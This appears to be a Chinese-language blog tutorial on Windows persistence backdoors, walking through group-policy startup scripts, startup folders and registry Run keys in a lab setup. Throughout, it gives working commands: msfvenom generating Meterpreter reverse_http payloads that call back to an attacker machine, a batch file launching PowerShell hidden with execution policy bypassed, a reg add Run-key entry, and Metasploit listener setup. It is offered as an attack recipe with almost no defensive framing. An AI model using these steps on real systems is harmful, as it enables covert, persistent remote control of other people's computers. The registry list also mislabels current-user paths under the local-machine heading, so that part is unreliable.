操作系统权限维持(三)之Windows系统-启动项维持后门

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门

启动项维持后门

启动项

启动项,操作系统在启动的时候,自动加载了很多程序。会在前台或者后台运行,进程表中出现了很多的进程。也许有病毒或木马在自启动行列。

添加启动项的方式:
1、组策略
2、启动文件夹
3、注册表

组策略

可以通过利用组策略开机启动脚本

1、在运行框中输入 “gpedit.msc ”,打开组策略

操作系统权限维持(三)之Windows系统-启动项维持后门_第1张图片

2、在【计算机配置】->【在Windows设置】->【脚本(启动/关机)】双击【启动】就可以进行设置

操作系统权限维持(三)之Windows系统-启动项维持后门_第2张图片

选择在这里要添加的脚本,当Windows机器系统每次重启之后,就会去运行在这里的脚本文件

3、选择要添加的脚本或者PowerShell

机器名 IP
Kali 192.168.52.130
Win10 192.168.52.131

用msf生成一个powershell的木马

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f psh -o shell.ps1

在这里插入图片描述

上传木马文件到目标机器上

创建一个1.bat脚本,并且添加到组策略【脚本】中

操作系统权限维持(三)之Windows系统-启动项维持后门_第3张图片

bat脚本内容如下:

@echo off
powershell.exe ­-w hidden ­-ExecutionPolicy Bypass ­-NoExit ­-File C:\Users\Administart\Desktop\shell.ps1
exit

kali运行msf进行监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

操作系统权限维持(三)之Windows系统-启动项维持后门_第4张图片

重启Win10机器,win10机器上线

操作系统权限维持(三)之Windows系统-启动项维持后门_第5张图片

启动文件夹

启动文件夹 里面的文件可以会在开机的时候自动启动。通过开始菜单——所有程序——启动 这个文件夹内,可以将程序开机自动启动

启动文件夹:

C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限

组策略脚本启动文件夹:

C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown
C:\Windows\System32\GroupPolicy\User\Scripts\Logon
C:\Windows\System32\GroupPolicy\User\Scripts\Logoff

生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe

操作系统权限维持(三)之Windows系统-启动项维持后门_第6张图片

我们将我们要运行的恶意脚本上传到目标服务器上的启动项文件夹下

操作系统权限维持(三)之Windows系统-启动项维持后门_第7张图片

kali机器开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

在这里插入图片描述

Win10机器重启,靶机上线

操作系统权限维持(三)之Windows系统-启动项维持后门_第8张图片

注册表

注册表(Registry,繁体中文版Windows操作系统称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息

打开注册表

win+r输入regedit

操作系统权限维持(三)之Windows系统-启动项维持后门_第9张图片

以下的注册表路径都是注册表的启动项

# HKEY_LOCAL_MACHINE类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
# HKEY_CURRENT_USER类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

我们拿其中一个做为列子

操作系统权限维持(三)之Windows系统-启动项维持后门_第10张图片

msf生成木马文件

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.52.130 lport=3333 -f exe -o shell.exe

操作系统权限维持(三)之Windows系统-启动项维持后门_第11张图片
将木马文件上传至目标服务器

使用reg add 命令进行添加

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Users\Administart\Desktop\shell.exe"

操作系统权限维持(三)之Windows系统-启动项维持后门_第12张图片
kali机器开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.130
set LPORT 3333
run

在这里插入图片描述

重启Win10机器,靶机上线

操作系统权限维持(三)之Windows系统-启动项维持后门_第13张图片

你可能感兴趣的:(操作系统权限维持,windows,网络安全,网络,安全)